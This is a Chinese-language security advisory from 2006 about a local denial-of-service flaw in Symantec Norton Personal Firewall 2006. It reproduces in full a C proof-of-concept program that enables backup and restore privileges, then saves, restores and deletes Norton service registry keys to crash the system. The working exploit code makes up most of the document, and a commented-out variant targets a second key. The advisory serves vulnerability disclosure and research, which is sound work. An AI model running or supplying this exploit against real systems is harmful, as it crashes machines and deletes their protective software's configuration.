| 2006-7-19
受影响系统:
Symantec Norton Personal Firewall 2006 9.1.0.33
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18995
Symantec Norton个人防火墙是非常流行的防火墙软件。
Norton个人防火墙实现上存在漏洞,本地攻击者可能利用此漏洞对防火墙执行拒绝服务攻击。
Norton防火墙没有正确地检查对标准Windows API函数RegSaveKey、RegRestoreKey和RegDeleteKey的调用。在注册表项 HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc 或 HKLM\SYSTEM\CurrentControlSet\Services\SymEvent 对上述函数的组合调用会触发Norton驱动实现中的错误,导致系统崩溃。
<*来源:David Matousek (david@matousec.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115298587710164&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard registry functions on the registry key "HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc".
This results in system crash. System crashes also if registry key "HKLM\SYSTEM\CurrentControlSet\Services\SymEvent"
is used.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
void about(void)
{
printf("Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2006 by Matousec - Transparent security\n");
printf("http://www.matousec.com/\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %d\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %d.\n",code);
return;
}
/*
enable_privilege adds privilege to own token
returns TRUE if succeed
*/
int enable_privilege(char *priv_name)
{
DWORD res=0;
HANDLE tok;
LUID luid;
TOKEN_PRIVILEGES privs;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&tok)) return 0;
if (LookupPrivilegeValue(NULL,priv_name,&luid))
{
privs.PrivilegeCount=1;
privs.Privileges[0].Luid=luid;
privs.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
DWORD ret_len;
res=AdjustTokenPrivileges(tok,0,&privs,sizeof(TOKEN_PRIVILEGES),NULL,&ret_len);
CloseHandle(tok);
}
return res;
}
/*
enable_backup_privilege adds backup privilege to own token
returns TRUE if succeed
*/
int enable_backup_privilege(void)
{
return enable_privilege(SE_BACKUP_NAME);
}
/*
enable_restore_privilege adds restore privilege to own token
returns TRUE if succeed
*/
int enable_restore_privilege(void)
{
return enable_privilege(SE_RESTORE_NAME);
}
int main(int argc,char **argv)
{
about();
enable_restore_privilege();
enable_backup_privilege();
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0,KEY_READ,&key);
RegSaveKey(key,"bug.regsav",NULL);
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0,
NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
RegRestoreKey(key,"bug.regsav",0);
RegCloseKey(key);
DeleteFile("bug.regsav");
RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0,KEY_READ,&key);
RegSaveKey(key,"bug.regsav",NULL);
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0,
NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
RegRestoreKey(key,"bug.regsav",0);
RegCloseKey(key);
DeleteFile("bug.regsav");
RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum");
/*
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0,KEY_READ,&key);
RegSaveKey(key,"bug.regsav",NULL);
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0,
NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
RegRestoreKey(key,"bug.regsav",0);
RegCloseKey(key);
DeleteFile("bug.regsav");
RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0,KEY_READ,&key);
RegSaveKey(key,"bug.regsav",NULL);
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0,
NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
RegRestoreKey(key,"bug.regsav",0);
RegCloseKey(key);
DeleteFile("bug.regsav");
RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum");
*/
printf("\nTEST FAILED!\n");
return 1;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.symantec.com/sabu/nis/npf/
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)